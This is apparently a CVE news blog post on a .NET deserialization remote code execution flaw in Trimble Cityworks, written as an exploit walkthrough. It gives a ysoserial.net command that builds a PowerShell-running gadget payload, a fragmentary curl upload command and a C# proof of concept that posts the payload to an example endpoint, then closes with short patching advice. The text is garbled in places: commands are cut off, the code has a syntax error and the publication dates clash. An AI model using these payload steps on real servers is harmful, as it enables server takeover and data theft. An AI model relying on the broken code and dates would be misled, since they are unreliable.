CVE CyberSecurity Database News

CVE-2025-0994 - Breaking Down the Remote Code Execution Flaw in Trimble Cityworks – Exploit Details & Simple Walkthrough

Poster -

Published: June 2024
*Author: Cityworks Security Explorer*

What is CVE-2025-0994?

CVE-2025-0994 is a recently disclosed security vulnerability affecting Trimble Cityworks – a popular enterprise asset management and permitting platform used by municipalities and utilities. Specifically, all Cityworks versions prior to 15.8.9 and Cityworks Office Companion versions prior to 23.10 are exposed.

This security weakness is categorized as a deserialization vulnerability. When left unpatched, it can allow authenticated users to achieve remote code execution (RCE) on the server running Cityworks, typically hosted on Microsoft’s IIS.

How Serious is This?

Deserialization vulnerabilities are serious because improper handling of serialized objects can let attackers inject malicious code, often leading to full system compromise.

Impact: Run arbitrary commands or code on the Cityworks IIS web server

- Example risk: An attacker could plant malware, steal sensitive citizen records, or turn the server into a launchpad for attacks on other infrastructure.

What Causes the Flaw?

Cityworks’ backend accepts serialized objects (data packets wrapped up for transmission and use in .NET’s object format) sent from the web client. Older or misconfigured Cityworks versions handle object deserialization unsafely. If an attacker crafts a serialized .NET payload that contains commands, and uploads it by abusing a legitimate API (say, through a workflow or document upload endpoint), the malicious contents get executed on the server under IIS's privileges.

The vulnerability lives in how user-provided serialized objects are deserialized.

- The application fails to enforce object type whitelisting or integrity checks during deserialization.

Crafting the Payload

Attackers use gadgets from the .NET Serialization ecosystem. Tools like ysoserial.net provide ready-to-use payloads for .NET apps.

`bash

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -o raw -c "powershell -encodedcommand"

Delivering the Payload

The attacker uploads or injects the serialized payload into an API endpoint susceptible to deserialization – historically, these may include parts of the workflow or custom data import/export features.

H "Authorization: Bearer" \

-H "Content-Type: application/octet-stream" \

data-binary "@payload.bin" \

https://cityworks.example.com/Cityworks/Service/SomeVulnerableEndpoint

Payload Execution

When the Cityworks backend processes the uploaded object, it deserializes it without adequate safety checks. This triggers execution of the embedded commands on the server. The attacker receives a reverse shell, exfiltrates data, or escalates their attack further.

Proof-of-Concept (PoC) Code

Here’s a basic snippet using C# to send a malicious payload if you were testing in a legal, authorized environment:

using System.Net.Http;
using System.IO;

class Program {
    static async Task Main(string[] args) {
        var client = new HttpClient();
        var data = File.ReadAllBytes("payload.bin");
        var content = new ByteArrayContent(data);
        content.Headers.ContentType = new System.Net.Http.Headers.MediaTypeHeaderValue("application/octet-stream");
        // Replace endpoint below with the vulnerable Cityworks endpoint
        var response = await client.PostAsync("https://cityworks.example.com/Cityworks/Service/UploadEndpoint";, content);
        System.Console.WriteLine(await response.Content.ReadAsStringAsync());
    }
}

Note: Never test this outside of your own lab or without explicit permission.

Limit direct user uploads: Only allow trusted users and audit logins.

- Patch IIS and Windows: Sometimes attackers chain this with unpatched Windows/IIS flaws.

References

- Trimble Security Advisory: Cityworks Deserialization flaw (June 2024)
- CVE Record: CVE-2025-0994 @ NIST NVD
- OWASP - Deserialization of Untrusted Data
- ysoserial.net payload generator

Conclusion

CVE-2025-0994 is a textbook example of how even tools intended for business productivity, when mishandled, can expose serious risks. The vulnerability empowers any authenticated user to run commands on your Cityworks server – with potential for devastating results. Patching, strict access monitoring, and routine code audits are your first defense.

If you’re running a vulnerable version, update today. If you need help or incident response, work with Trimble support and your security team immediately.


*Stay safe and patch fast. Security is everyone’s job!*

Timeline

Published on: 02/06/2025 16:15:41 UTC
Last modified on: 02/12/2025 19:29:30 UTC